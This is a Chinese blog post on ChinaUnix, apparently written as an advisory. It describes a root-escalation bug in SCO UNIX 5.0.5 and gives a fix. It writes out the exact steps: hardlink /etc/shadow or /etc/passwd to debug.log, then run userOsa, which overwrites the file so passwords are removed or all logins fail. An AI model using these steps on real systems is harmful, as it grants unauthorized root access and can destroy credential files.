SCO UNIX 5.0.5普通用户成为超级用户的BUG-sdccf-ChinaUnix博客

Fosdccf.blog.chinaunix.net

首页　| 　博文目录　| 　关于我

sdccf

博客访问： 101156692
博文数量： 19283
博客积分： 9968
博客等级：上将
技术积分： 196062
用户组：普通用户
注册时间： 2007-02-07 14:28

文章分类

全部博文（19283）

香文化（0）
CU技术专题（2443）

Linux酷软（214）

tmp（0）

PostgreSQL（93）

Solaris（383）

AIX（173）

SCOUNIX（575）

DB2（1005）
涂鸦（9）
编程开发（1573）

Shell（386）

C/C++（1187）
数据库（6458）

MySQL（1750）

Sybase（465）

Oracle（3695）

Informix（548）
操作系统（8627）

HP-UX（0）

IBM AIX（2）

Sun Solaris（0）

BSD（1）

Linux（8597）

SCO UNIX（23）
未分配的博文（173）

文章存档

2011年（1）

2009年（125）

2008年（19094）

2007年（63）

我的朋友

最近访客

推荐博文

SCO UNIX 5.0.5普通用户成为超级用户的BUG

分类：

2008-03-25 21:01:44

SCO5.0.5 Unix 有一个大BUG——任何普通用户都可以成为超级用户.

步骤:

    1. 用普通用户登录到系统,然后进入一个有写权限的目录
    2. ln /etc/shadow debug.log        (硬连接)
    3. 执行/etc/sysadm.d/bin/userOsa   (O是大写的字母o)

    操作完成之后,/etc/shadow文件被覆盖, 此时可以使用系统中的
    任何用户登陆系统,不用密码,包括root用户.

    注: 如果2中改为ln /etc/passwd debug.log
        则/etc/passwd被覆盖,谁也登录不了系统.


原因:
        SCO5.0.5 Unix中/etc/sysadm.d/bin/userOsa程序在
        运行时会生成一个名叫debug.log的文件,这个文件用户属于
        root 组，而且此程序有BUG,不会检查用户权限,因此可以
        覆盖任何文件,包括passwd和shadow.

清除此漏洞:
        用root用户登录,到/etc/sysadm.d/bin下执,行
        chmod o-x userOsa即可

此漏洞只在SCO5.0.5 unix存在, SCO5.0.6 unix或更高版本不
存在.

阅读(512) | 评论(0) | 转发(0) |

上一篇：局域网内用一个License安装多台SCO OpenServer

下一篇：WIN 9X和SCO OpenServer的双系统安装

给主人留下些什么吧！~~

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6